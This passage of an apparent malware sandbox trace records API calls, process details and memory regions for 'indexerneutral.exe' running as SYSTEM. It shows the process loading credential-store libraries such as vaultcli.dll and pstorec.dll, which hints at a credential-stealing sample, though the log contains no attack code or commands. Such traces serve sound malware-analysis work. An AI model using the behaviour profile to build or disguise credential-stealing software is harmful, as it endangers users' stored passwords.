[0251.083] RegCloseKey (hKey=0x14c) returned 0x0 [0251.083] LoadLibraryW (lpLibFileName="C:\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\system\\msmapi\\1033\\msmapi32.dll") returned 0x0 [0251.336] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0251.336] ExitProcess (uExitCode=0x0) Thread: id = 520 os_tid = 0x430 Process: id = "28" image_name = "indexerneutral.exe" filename = "c:\\windows\\syswow64\\indexerneutral.exe" page_root = "0x1e8fe000" os_pid = "0x7f0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x6cc" cmd_line = "\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" /scomma \"C:\\Windows\\TEMP\\2ECB.tmp\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3935 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3936 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3937 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3938 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3939 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3940 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3941 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3942 start_va = 0x400000 end_va = 0x470fff entry_point = 0x400000 region_type = mapped_file name = "indexerneutral.exe" filename = "\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe") Region: id = 3943 start_va = 0x77510000 end_va = 0x77688fff entry_point = 0x77510000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3944 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3945 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3946 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3947 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3948 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3949 start_va = 0x7fff0000 end_va = 0x7fff9f1bffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3950 start_va = 0x7fff9f1c0000 end_va = 0x7fff9f381fff entry_point = 0x7fff9f1c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3951 start_va = 0x7fff9f382000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007fff9f382000" filename = "" Region: id = 3971 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 3972 start_va = 0x72130000 end_va = 0x721a2fff entry_point = 0x72130000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3973 start_va = 0x721b0000 end_va = 0x721fefff entry_point = 0x721b0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3974 start_va = 0x72200000 end_va = 0x72207fff entry_point = 0x72200000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4109 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4110 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4111 start_va = 0x1c0000 end_va = 0x27dfff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4112 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4113 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 4114 start_va = 0x480000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 4115 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4116 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 4117 start_va = 0x790000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 4118 start_va = 0x7d0000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 4119 start_va = 0x738e0000 end_va = 0x738e7fff entry_point = 0x738e0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4120 start_va = 0x73910000 end_va = 0x739a1fff entry_point = 0x73910000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 4121 start_va = 0x73f30000 end_va = 0x74153fff entry_point = 0x73f30000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 4122 start_va = 0x745b0000 end_va = 0x74608fff entry_point = 0x745b0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4123 start_va = 0x74610000 end_va = 0x74619fff entry_point = 0x74610000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4124 start_va = 0x74620000 end_va = 0x7463dfff entry_point = 0x74620000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4125 start_va = 0x74640000 end_va = 0x746ebfff entry_point = 0x74640000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4126 start_va = 0x74790000 end_va = 0x75b4efff entry_point = 0x74790000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4127 start_va = 0x75b50000 end_va = 0x75c39fff entry_point = 0x75b50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4128 start_va = 0x75ca0000 end_va = 0x75e59fff entry_point = 0x75ca0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4129 start_va = 0x75e60000 end_va = 0x75f1dfff entry_point = 0x75e60000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4130 start_va = 0x760a0000 end_va = 0x760e3fff entry_point = 0x760a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4131 start_va = 0x760f0000 end_va = 0x7616afff entry_point = 0x760f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4132 start_va = 0x76210000 end_va = 0x76252fff entry_point = 0x76210000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4133 start_va = 0x76260000 end_va = 0x7631dfff entry_point = 0x76260000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 4134 start_va = 0x76320000 end_va = 0x76495fff entry_point = 0x76320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4135 start_va = 0x765e0000 end_va = 0x765eefff entry_point = 0x765e0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4136 start_va = 0x765f0000 end_va = 0x766dffff entry_point = 0x765f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4137 start_va = 0x76aa0000 end_va = 0x76ae3fff entry_point = 0x76aa0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4138 start_va = 0x76af0000 end_va = 0x76c3cfff entry_point = 0x76af0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4139 start_va = 0x76c40000 end_va = 0x76c4bfff entry_point = 0x76c40000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4140 start_va = 0x76c50000 end_va = 0x7712cfff entry_point = 0x76c50000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4141 start_va = 0x77310000 end_va = 0x7744ffff entry_point = 0x77310000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4142 start_va = 0x77450000 end_va = 0x774dcfff entry_point = 0x77450000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4143 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 4144 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4145 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 4146 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 4147 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4148 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4149 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 4150 start_va = 0x8d0000 end_va = 0xa57fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 4151 start_va = 0xa60000 end_va = 0xbe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 4152 start_va = 0xbf0000 end_va = 0xcaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 4153 start_va = 0xdb0000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 4165 start_va = 0xcb0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 4166 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 4168 start_va = 0xdc0000 end_va = 0x10f6fff entry_point = 0xdc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4173 start_va = 0x74180000 end_va = 0x74440fff entry_point = 0x74180000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 4174 start_va = 0x746f0000 end_va = 0x74781fff entry_point = 0x746f0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4212 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x3f0000 region_type = mapped_file name = "counters.dat" filename = "\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\windows\\syswow64\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 4213 start_va = 0x73f00000 end_va = 0x73f12fff entry_point = 0x73f00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4214 start_va = 0x73ee0000 end_va = 0x73efafff entry_point = 0x73ee0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4215 start_va = 0x73eb0000 end_va = 0x73edefff entry_point = 0x73eb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4245 start_va = 0x73810000 end_va = 0x73817fff entry_point = 0x73810000 region_type = mapped_file name = "pstorec.dll" filename = "\\Windows\\SysWOW64\\pstorec.dll" (normalized: "c:\\windows\\syswow64\\pstorec.dll") Region: id = 4292 start_va = 0x737c0000 end_va = 0x737f5fff entry_point = 0x737c0000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 4295 start_va = 0x736f0000 end_va = 0x737b4fff entry_point = 0x736f0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 4310 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4311 start_va = 0x1100000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 4312 start_va = 0x5d0000 end_va = 0x5d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 4313 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4314 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4315 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4316 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4317 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4318 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4319 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4320 start_va = 0x766e0000 end_va = 0x766e5fff entry_point = 0x766e0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 4321 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4322 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4323 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4324 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4325 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4326 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4327 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4328 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4329 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4330 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4331 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4332 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4333 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4334 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4335 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4336 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4337 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4338 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4339 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4340 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4341 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4342 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4343 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Thread: id = 518 os_tid = 0x7f4 [0251.450] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0251.450] __set_app_type (_Type=0x2) [0251.450] __p__fmode () returned 0x75f14d6c [0251.450] __p__commode () returned 0x75f15b1c [0251.450] __wgetmainargs (in: _Argc=0x19ff54, _Argv=0x19ff58, _Env=0x19ff5c, _DoWildCard=0, _StartInfo=0x19ff60 | out: _Argc=0x19ff54, _Argv=0x19ff58, _Env=0x19ff5c) returned 0 [0251.451] _onexit (_Func=0x444109) returned 0x444109 [0251.451] _onexit (_Func=0x44411a) returned 0x44411a [0251.451] _onexit (_Func=0x44412b) returned 0x44412b [0251.451] _onexit (_Func=0x44414a) returned 0x44414a [0251.451] _onexit (_Func=0x44418b) returned 0x44418b [0251.451] _onexit (_Func=0x44419c) returned 0x44419c [0251.452] GetStartupInfoW (in: lpStartupInfo=0x19ff08 | out: lpStartupInfo=0x19ff08*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\indexerneutral.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0251.452] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0251.452] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x73910000 [0251.452] GetProcAddress (hModule=0x73910000, lpProcName="InitCommonControlsEx") returned 0x73915000 [0251.452] InitCommonControlsEx (picce=0x19f7c0) returned 1 [0251.453] FreeLibrary (hLibModule=0x73910000) returned 1 [0251.453] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x74790000 [0251.454] GetProcAddress (hModule=0x74790000, lpProcName="SHGetSpecialFolderPathW") returned 0x7491edb0 [0251.454] SetErrorMode (uMode=0x8001) returned 0x1 [0251.454] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.454] EnumResourceTypesW (hModule=0x400000, lpEnumFunc=0x413540, lParam=0x0) returned 1 [0251.454] EnumResourceNamesW (hModule=0x400000, lpType=0x1, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0251.454] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x1) returned 0x4545f8 [0251.454] SizeofResource (hModule=0x400000, hResInfo=0x4545f8) returned 0x134 [0251.454] LoadResource (hModule=0x400000, hResInfo=0x4545f8) returned 0x454868 [0251.454] LockResource (hResData=0x454868) returned 0x454868 [0251.454] EnumResourceNamesW (hModule=0x400000, lpType=0x2, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0251.454] FindResourceW (hModule=0x400000, lpName=0x68, lpType=0x2) returned 0x454608 [0251.454] SizeofResource (hModule=0x400000, hResInfo=0x454608) returned 0x3e8 [0251.454] LoadResource (hModule=0x400000, hResInfo=0x454608) returned 0x45499c [0251.454] LockResource (hResData=0x45499c) returned 0x45499c [0251.454] FindResourceW (hModule=0x400000, lpName=0x85, lpType=0x2) returned 0x454618 [0251.454] SizeofResource (hModule=0x400000, hResInfo=0x454618) returned 0xd8 [0251.454] LoadResource (hModule=0x400000, hResInfo=0x454618) returned 0x454d84 [0251.454] LockResource (hResData=0x454d84) returned 0x454d84 [0251.454] FindResourceW (hModule=0x400000, lpName=0x86, lpType=0x2) returned 0x454628 [0251.454] SizeofResource (hModule=0x400000, hResInfo=0x454628) returned 0xd8 [0251.455] LoadResource (hModule=0x400000, hResInfo=0x454628) returned 0x454e5c [0251.455] LockResource (hResData=0x454e5c) returned 0x454e5c [0251.455] EnumResourceNamesW (hModule=0x400000, lpType=0x3, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0251.455] FindResourceW (hModule=0x400000, lpName=0x2, lpType=0x3) returned 0x454638 [0251.455] SizeofResource (hModule=0x400000, hResInfo=0x454638) returned 0x10a8 [0251.455] LoadResource (hModule=0x400000, hResInfo=0x454638) returned 0x454f34 [0251.455] LockResource (hResData=0x454f34) returned 0x454f34 [0251.455] FindResourceW (hModule=0x400000, lpName=0x3, lpType=0x3) returned 0x454648 [0251.455] SizeofResource (hModule=0x400000, hResInfo=0x454648) returned 0x468 [0251.455] LoadResource (hModule=0x400000, hResInfo=0x454648) returned 0x455fdc [0251.455] LockResource (hResData=0x455fdc) returned 0x455fdc [0251.455] FindResourceW (hModule=0x400000, lpName=0x4, lpType=0x3) returned 0x454658 [0251.455] SizeofResource (hModule=0x400000, hResInfo=0x454658) returned 0x468 [0251.455] LoadResource (hModule=0x400000, hResInfo=0x454658) returned 0x456444 [0251.455] LockResource (hResData=0x456444) returned 0x456444 [0251.455] FindResourceW (hModule=0x400000, lpName=0x5, lpType=0x3) returned 0x454668 [0251.455] SizeofResource (hModule=0x400000, hResInfo=0x454668) returned 0x468 [0251.455] LoadResource (hModule=0x400000, hResInfo=0x454668) returned 0x4568ac [0251.455] LockResource (hResData=0x4568ac) returned 0x4568ac [0251.455] FindResourceW (hModule=0x400000, lpName=0x6, lpType=0x3) returned 0x454678 [0251.455] SizeofResource (hModule=0x400000, hResInfo=0x454678) returned 0x468 [0251.455] LoadResource (hModule=0x400000, hResInfo=0x454678) returned 0x456d14 [0251.455] LockResource (hResData=0x456d14) returned 0x456d14 [0251.455] FindResourceW (hModule=0x400000, lpName=0x7, lpType=0x3) returned 0x454688 [0251.455] SizeofResource (hModule=0x400000, hResInfo=0x454688) returned 0x468 [0251.455] LoadResource (hModule=0x400000, hResInfo=0x454688) returned 0x45717c [0251.455] LockResource (hResData=0x45717c) returned 0x45717c [0251.455] FindResourceW (hModule=0x400000, lpName=0x8, lpType=0x3) returned 0x454698 [0251.456] SizeofResource (hModule=0x400000, hResInfo=0x454698) returned 0x468 [0251.456] LoadResource (hModule=0x400000, hResInfo=0x454698) returned 0x4575e4 [0251.456] LockResource (hResData=0x4575e4) returned 0x4575e4 [0251.456] FindResourceW (hModule=0x400000, lpName=0x9, lpType=0x3) returned 0x4546a8 [0251.456] SizeofResource (hModule=0x400000, hResInfo=0x4546a8) returned 0x468 [0251.456] LoadResource (hModule=0x400000, hResInfo=0x4546a8) returned 0x457a4c [0251.456] LockResource (hResData=0x457a4c) returned 0x457a4c [0251.456] EnumResourceNamesW (hModule=0x400000, lpType=0x4, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0251.456] FindResourceW (hModule=0x400000, lpName=0x66, lpType=0x4) returned 0x4546b8 [0251.456] SizeofResource (hModule=0x400000, hResInfo=0x4546b8) returned 0x424 [0251.456] LoadResource (hModule=0x400000, hResInfo=0x4546b8) returned 0x457eb4 [0251.456] LockResource (hResData=0x457eb4) returned 0x457eb4 [0251.456] FindResourceW (hModule=0x400000, lpName=0x68, lpType=0x4) returned 0x4546c8 [0251.456] SizeofResource (hModule=0x400000, hResInfo=0x4546c8) returned 0x1f4 [0251.456] LoadResource (hModule=0x400000, hResInfo=0x4546c8) returned 0x4582d8 [0251.456] LockResource (hResData=0x4582d8) returned 0x4582d8 [0251.456] EnumResourceNamesW (hModule=0x400000, lpType=0x5, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0251.456] FindResourceW (hModule=0x400000, lpName=0x69, lpType=0x5) returned 0x4546d8 [0251.456] SizeofResource (hModule=0x400000, hResInfo=0x4546d8) returned 0xa2 [0251.456] LoadResource (hModule=0x400000, hResInfo=0x4546d8) returned 0x4584cc [0251.456] LockResource (hResData=0x4584cc) returned 0x4584cc [0251.456] FindResourceW (hModule=0x400000, lpName=0x6b, lpType=0x5) returned 0x4546e8 [0251.456] SizeofResource (hModule=0x400000, hResInfo=0x4546e8) returned 0x296 [0251.456] LoadResource (hModule=0x400000, hResInfo=0x4546e8) returned 0x458570 [0251.456] LockResource (hResData=0x458570) returned 0x458570 [0251.456] FindResourceW (hModule=0x400000, lpName=0x6e, lpType=0x5) returned 0x4546f8 [0251.456] SizeofResource (hModule=0x400000, hResInfo=0x4546f8) returned 0x5be [0251.456] LoadResource (hModule=0x400000, hResInfo=0x4546f8) returned 0x458808 [0251.457] LockResource (hResData=0x458808) returned 0x458808 [0251.457] FindResourceW 